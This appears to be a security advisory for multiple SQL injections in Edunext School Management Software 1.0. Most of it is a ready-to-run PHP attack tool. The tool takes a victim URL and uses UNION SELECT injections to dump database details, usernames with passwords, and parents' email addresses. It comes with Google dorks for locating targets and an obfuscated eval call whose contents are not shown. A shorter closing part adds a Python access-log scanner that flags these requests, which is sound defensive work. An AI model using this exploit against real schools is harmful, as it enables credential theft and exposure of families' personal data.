
Edunext Systems + School Management Software 1.0 SQL Injection

21 Mar 2025 | Reported by Emiliano Febbi | Type: packetstorm | Source: packetstorm.news

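Multiple SQL injections were found in Edunext Systems School Management Software version 1.0 (tested on Windows 10). The proof of concept below targets the PAGE parameter of page.php and the gal_id parameter of image-gallery-detail.php, and its header comment describes the issue as unauthenticated.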

Code
# Exploit Title: Edunext Systems + School Management Software ( Multiple SQL injection )
    # Google Dork: inurl:/page.php?PAGE= , inurl:/image-gallery-detail.php?gal_id= , intext:Powered by Edunext Technologies
    # Date: 2025-03-20
    # Exploit Author: Emiliano Febbi
    # Vendor Homepage: https://edunexttechnologies.com/
    # Software Link: https://edunexttechnologies.com/school-management-software.php
    # Version: 1.0
    # Tested on: Windows 10
    
    [code]
    
    
    <?php
    /*
    Not Authenticated why an external server manages logins.
    ----------------------------------------------------------------------------
    Edunext Systems are flawed ((Indian School Management CMS)Training Exploit)
    ----------------------------------------------------------------------------
    emilianofebbi.1994 -at- gmail -dot- com
    
    Author: Emiliano Febbi
    nullsite.altervista.org
    */
    echo'<html><head><title>Indian School Management CMS Multiple SQL injection</title><style>
    body { cursor: crosshair; min-height: 100vh; }</style></head><body>
    <body bgcolor="#000000"><body text="#00ffff"><body link="#808080"><body vlink="#808080">
    <center><form action="'.$SERVER[PHP_SELF].'" method="POST">+ insert victim site +<br> 
    <input type="text" name="victim_url" value="http://www.site.com/">
    <td><font color="#ff0000"> or /dir/</font></td><br>
    <font color="black">..</font>
    <select name="select_bug" id="???"><option value="one">page.php?PAGE=</option>
    <option value="two">image-gallery-detail</option><option value="iframe">#IFRAME=method</option></select><font color="red"> #Select bug</font>
    <br><input type="text" name="num_var" value="2" style="height: 25px;width: 28px">
    <font color="red">Page value: EX: 2</font><br>
    <input type="submit" style="background-color:#00ffff" value="go!"/></form></center></body></html>';
    print "<center>";
    //           Main Server contains alla databases
    //################ ---------> <---------- ##################
    eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
    //################ ---------> <---------- ##################
    print "</center>";
    //#page.php?PAGE=
    if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "one")) {
      $host = $_POST['victim_url'];
          $num = $_POST['num_var'];
       $bug = $_POST['select_bug'];
    //portal Login and General Login
    $Logins = array("login/login.php", "login/?next=");
    foreach($Logins as $nullus_Logins) {
    if (false!==file("$host$nullus_Logins")) print "Found:<div style='background-color: #00ffff; color: black;'><a href='$host$nullus_Logins'>$nullus_Logins</a></div></center>";
    };
    print "<center>";
    print "<font color='red'>#host:</font> $host<br>";
    print "<font color='red'>#DB Version: </font>";
    $sperimental = array('<div class="span8 data-table">', '</style>', '<div class="data">');
    foreach($sperimental as $sperimentalx) {
    
         $getall=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,version(),3,4,5,6,7,8,9,10--");
         $getallz=explode("$sperimentalx",$getall);
         $getallz=explode("</div>",$getallz[1]);
              var_dump(strip_tags($getallz[0]));
    print "<br><font color='red'>#DB Name: </font>";
         $getalll=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,database(),3,4,5,6,7,8,9,10--");
         $getallzz=explode("$sperimentalx",$getalll);
         $getallzz=explode("</div>",$getallzz[1]);
               var_dump(strip_tags($getallzz[0]));
    } //???
    $sperimentalz = array('<div class="span8 data-table">', '</style>', '<div class="data">');
    foreach($sperimentalz as $sperimentaly) {
    print "<br><font color='red'>#users:</font><br>";
    $get_users=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),3,4,5,6,7,8,9,10%20FROM%20users--");
         $usertbl=explode("$sperimentaly",$get_users);
         $usertbl=explode("</div>",$usertbl[1]);
              var_dump(strip_tags($usertbl[0]));
    } //??? #2
    $sperimentalzz = array('<div class="span8 data-table">', '</style>', '<div class="data">');
    foreach($sperimentalzz as $sperimentalxy) {
    print "<center>";
    print "<br><font color='red'>#E-Mails Founds in database:</font><br>";
    $get_users=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(mother_email,+%20%27%3Cbr%20/%3E%27%20+,father_email),3,4,5,6,7,8,9,10%20FROM%20alumni_registration--");
         $usertbl=explode("$sperimentalxy",$get_users);
         $usertbl=explode("</div>",$usertbl[1]);
              var_dump(strip_tags($usertbl[0]));
    print "</center>";
    } //??? #3
    if(file_get_contents("$host". "upload/")) {
    print "<center><h2>#Lucky Strike</h2>";
    $found_DIRt = file_get_contents("$host". "upload/");
    print $found_DIRt;
    print "</center>";
    }
      };;;
    //#image-gallery-detail
    if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "two")) {
      $host = $_POST['victim_url'];
          $num = $_POST['num_var'];
       $bug = $_POST['select_bug'];
    //portal Login and General Login
    $Loginss = array("login/login.php", "login/?next=");
    foreach($Loginss as $nullus_Loginss) {
    if (false!==file("$host$nullus_Loginss")) print "Found:<div style='background-color: #00ffff; color: black;'><a href='$host$nullus_Loginss'>$nullus_Loginss</a></div></center>";
    };
    print "<center>";
    print "<font color='red'>#host:</font> $host<br>";
    print "<font color='red'>#DB Version: </font>";
    $sperimental_gall = array('Image Gallery /', '', '');
    foreach($sperimental_gall as $sperimental_gallery) {
    $getallx=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
         $getallzx=explode("$sperimental_gallery",$getallx);
         $getallzx=explode("</span>",$getallzx[1]);
              var_dump(strip_tags($getallzx[0]));
          //.................OR..................
    $getallxb=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
         $getallzxb=explode("$sperimental_gallery",$getallxb);
         $getallzxb=explode("</span>",$getallzxb[1]);
                 var_dump(strip_tags($getallzxb[0]));
          //.................OR..................
    $getallxbc=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
         $getallzxbc=explode("$sperimental_gallery",$getallxbc);
         $getallzxbc=explode("</p>",$getallzxbc[1]);
               var_dump(strip_tags($getallzxbc[0]));
    print "<center><br><font color='red'>#DB Name: </font>";
    //#database();
    $getallxdb=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
         $getallzxdb=explode("$sperimental_gallery",$getallxdb);
         $getallzxdb=explode("</span>",$getallzxdb[1]);
              var_dump(strip_tags($getallzxdb[0]));
    $getallxdbc=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
         $getallzxdbc=explode("$sperimental_gallery",$getallxdbc);
         $getallzxdbc=explode("</span>",$getallzxdbc[1]);
              var_dump(strip_tags($getallzxdbc[0]));
    $getallxdbcd=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
         $getallzxdbcd=explode("$sperimental_gallery",$getallxdbcd);
         $getallzxdbcd=explode("</p>",$getallzxdbcd[1]);
                 var_dump(strip_tags($getallzxdbcd[0]));          
    print "</center>";          
            }
             //beyond
             //Variant 1#
    $sperimental_gallv = array('Image Gallery /', '', '');
    foreach($sperimental_gallv as $sperimental_galleryvv) {
    print "<center><br><font color='red'>#users:<br></font>";
    $getallxk=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
         $getallzxk=explode("$sperimental_galleryvv",$getallxk);
         $getallzxk=explode("</span>",$getallzxk[1]);
                 var_dump(strip_tags($getallzxk[0]));
    print "</center>";
           //Variant 2#
    $getallxdbcww=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
         $getallzxdbcww=explode("$sperimental_galleryvv",$getallxdbcww);
         $getallzxdbcww=explode("</div>",$getallzxdbcww[1]);
                    var_dump(strip_tags($getallzxdbcww[0]));       
          //Variant 3#
    print "<center>";
    $getallxdbcwwxx=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
         $getallzxdbcwwxx=explode("$sperimental_galleryvv",$getallxdbcwwxx);
         $getallzxdbcwwxx=explode("</p>",$getallzxdbcwwxx[1]);
                    var_dump(strip_tags($getallzxdbcwwxx[0]));
    print "</center>";
    }
    //#Dir trav.
    if(file_get_contents("$host". "upload/")) {
    print "<center><h2>#Lucky Strike</h2>";
    $found_DIRt = file_get_contents("$host". "upload/");
    print $found_DIRt;
    print "</center>";
    }
            };;;;
    //#IFRAME method=100% success
    //--IF you usage this method select well value page or try random value--
    if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "iframe")) {
      $host = $_POST['victim_url'];
          $num = $_POST['num_var'];
       $bug = $_POST['select_bug'];
    print "<center>";
    //portal Login and General Login
    $Loginssx = array("login/login.php", "login/?next=");
    foreach($Loginssx as $nullus_Loginssx) {
    if (false!==file("$host$nullus_Loginssx")) print "Found:<div style='background-color: #00ffff; color: black;'><a href='$host$nullus_Loginssx'>$nullus_Loginssx</a></div></center>";
    };
    print "<br><TABLE borderColor=aqua  cellSpacing=0 cellPadding=10 width='41%' align= center border=5><tr><td>";
    print "page.php?PAGE=<br>";
    print "<font color='red'>#DB Version ~ #DB Name:<br></font>";
    print "<iframe width='500' height='300' src='$host/page.php?PAGE=-$num%20union%20all%20select%20database(),version(),3,4,5,6,7,8,9,10--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#users:<br></font>";
    print "<iframe width='500' height='300' src='$host/page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),3,4,5,6,7,8,9,10%20FROM%20users--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#E-mails:<br></font>";
    print "<iframe width='500' height='300' src='$host/page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(mother_email,+%20%27%3Cbr%20/%3E%27%20+,father_email),3,4,5,6,7,8,9,10%20FROM%20alumni_registration--' style='border:3px solid aqua;'></iframe><br>";
    print "</td></tr><table>";
              //#Variant 1
    print "<TABLE borderColor=aqua  cellSpacing=0 cellPadding=10 width='41%' align= center border=5><tr><td>";
    print "Image-Gallery-Detail.php?gal_id=<br>";
    print "<font color='red'>#DB Version:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#DB Name:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#users:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--' style='border:3px solid aqua;'></iframe><br>";
    print "</td></tr><table>";
              //#Variant 2
    print "<TABLE borderColor=aqua  cellSpacing=0 cellPadding=10 width='41%' align= center border=5><tr><td>";
    print "image-gallery-detail.php?gal_id=<br>";
    print "<font color='red'>#DB Version:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#DB Name:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#users:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--' style='border:3px solid aqua;'></iframe><br>";
    print "</td></tr><table>";
    print "</center>";
    };;;;;           
    ?>
    [/code]
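
For defenders reviewing web-server logs: every request the proof of concept sends puts something other than a plain integer into PAGE (page.php) or gal_id (image-gallery-detail.php). The Python below is an added example, not part of the original advisory or the vendor's code; it assumes the combined access-log format and that legitimate ids are non-negative integers, and its log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint (lower-cased) -> injectable parameter, both named in the advisory.
WATCHED = {"page.php": "PAGE", "image-gallery-detail.php": "gal_id"}

# Assumption: Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')

# Keywords that appear in the advisory's UNION-based requests.
SQL_HINT = re.compile(
    r"\b(?:union|select|group_concat|version\s*\(|database\s*\()", re.I)

def classify(line):
    """Return (ip, endpoint, param, value, reason) for a suspect request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # The PoC requests the gallery script in two letter cases, so normalise.
    endpoint = parts.path.rsplit("/", 1)[-1].lower()
    param = WATCHED.get(endpoint)
    if param is None:
        return None
    # parse_qs percent-decodes, so %20union%20 is seen as " union ".
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if value.isascii() and value.isdigit():
            continue  # assumed legitimate: a plain non-negative integer id
        reason = "sql-keywords" if SQL_HINT.search(value) else "non-integer-id"
        return (m["ip"], endpoint, param, value, reason)
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Mar/2025:10:00:01 +0000] "GET /page.php?PAGE=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [21/Mar/2025:10:00:05 +0000] "GET /page.php?PAGE=-2%20union%20all%20select%201,version(),3,4,5,6,7,8,9,10-- HTTP/1.1" 200 5333',
    '203.0.113.9 - - [21/Mar/2025:10:00:06 +0000] "GET /Image-Gallery-Detail.php?gal_id=-2%20union%20all%20select%201,2,database(),4-- HTTP/1.1" 200 4102',
    '198.51.100.7 - - [21/Mar/2025:10:00:09 +0000] "GET /image-gallery-detail.php?gal_id=15 HTTP/1.1" 200 4090',
    '198.51.100.8 - - [21/Mar/2025:10:00:12 +0000] "GET /page.php?PAGE=about HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced in the application or at a WAF in front of these two scripts, rejects the requests before they reach the database; the log scan only tells you whether they have already been sent.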
